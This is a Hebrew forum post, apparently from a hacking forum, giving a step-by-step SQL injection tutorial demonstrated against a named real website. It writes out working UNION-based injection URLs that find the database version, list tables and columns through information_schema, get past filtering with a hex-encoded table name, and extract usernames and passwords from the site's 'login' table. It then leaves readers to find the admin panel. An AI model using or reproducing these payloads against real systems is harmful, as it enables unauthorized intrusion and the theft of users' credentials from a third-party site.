מדריך SQLI+הדגמה על אתר!!
שלום פורום אטרף הכנתי לכם מדריך בנושא: sql injection.
כמה דברים שניצטרך ליפני שנתחיל:
1.אתר לנסות להזריק
2.אתר אם דף פריץ
עכשיו נוכל להמשיך במדריך.
שלב א : גירסאת מסד נתונים
אתר: http://www.evt-me.com דף פריץ: http://www.evt-me.com/newsDetail.php?id=-8
כדי להתחיל ליפרוץ עלינו לדעת אים האתר פריץ, כאשר נוסיף גרש ' לאתר האתר ישתבש ויציג בפנינו שגיאה... דוגמא:
http://www.evt-me.com/newsDetail.php?id=-8%27
החזיר שגיאה? נוכל להמשיך.. נישתמש בפקודה union להוצאת/להכניס מידע למסד נתונים.
דוגמא: כאשר נישתמש בunion נוכל להוציא/להכניס מידע כאשר נמשיך עד שיוצג בפנינו מיספר שבוא נזריק תשיאלתות שלנו..
http://www.evt-me.com/newsDetail.php...ect+1,2,3,4,30
לא הראה לנו מיספר?? נמשיך מי 4 עד שזה יראה לנו. דוגמא:
http://www.evt-me.com/newsDetail.php...+1,2,3,4,5,6,7
כאשר הגענו ל7, זה הציג בפנינו תפלט 2, זה אומר שבפלט 2 מי בין ה7 נזריק תשיאלתות שלנו!! עכשיו עלינו לדעת את גירסאת המסד... נכניס בפלט 2 את הפקודה שבודקת את הגירסא: version() דוגמא:
http://www.evt-me.com/newsDetail.php...8%29,3,4,5,6,7
גירסאת מסד: 5.0.91-community
שלב ב : מציאת טלבאות והוצעת עמודות!
אחרי שגילינו את הגירסא זה אומר שנוכל להמשיך, בטח אתם שואלים למה היינו צריכים לדעת את הגירסא? אז... כאשר הגירסא היא 5+ אז יש תדטה בייס
database: בכל דטה בייס יש טלבאות ובגריסא 5+ יש דטה בייס שקוראים לו, information_schema ושם נימצאות כל הטבלאות. כאשר אנחנו יודעים מה מסמן הגירסא נוכל להוציא טבלאות ותעמודות, נכניס בפלט 2 את הפלט הבא: group_concat(table_name) ובסוף(אחרי המיספר 7): from information_schema.tables דוגמא:
http://www.evt-me.com/newsDetail.php..._schema.tables
נמשיך בכך, שניבחר טבלה מעניינת במיקרה שלנו יש טבלה בשם: login, נציץ בעמודות שלה, נישתמש בפלט הבא: group_concat(column_name) ובסוף(אחרי המיספר 7) form information_schema.columns+where+table_name='login' דוגמא:
http://www.evt-me.com/newsDetail.php...me=%27login%27
יש אתרים שחוסמים 'table_name' אז מה עושים, למזלנו יש פיתרון צריך להפוך את המילה login ל hex יש אתר שמראה אותיות באנגלית וב hex:
http://study.eitan.ac.il/sites/index...=7&page_id=159
login=hex=6c6f67696e
מוסיפים 0x זה צריך להיראות כך: 0x6c6f67696e אז נכניס בימקום 'admin'
0x6c6f67696e דוגמא:
http://www.evt-me.com/newsDetail.php...e=0x6c6f67696e
זה הציג בפנינו תעמודות הבאות:
id,pass,username,position,fullname
עכשיו פשוט ניבדוק תעמודות username,pass
שלב ג : שליפת שם מישתמש וסיסמה!
לאחר שגילינו תעמדות נישלוף תנתונים שלהם, על ידי שיאלתה פשוטה. נכניס בפלט 2 את השיאלתה הבאה : concat(username,char(58),pass) ובסוף(אחרי המיספר 7) :
from login דוגמא:
http://www.evt-me.com/newsDetail.php?id=-8+union+select+1,2,concat(username,char(58),pass),4,5,6,7 from login
מה שנישאר לעשות לימצוא פאנל היתחברות את זה תימצאו לבד..
טוב זהו פה היסתיים המדריך שלנו, מקווה שלמדתם היום משהו!!
קרדיט ל.. לי^^
ציטוט ההודעה
נכתב במקור על ידי Shinx
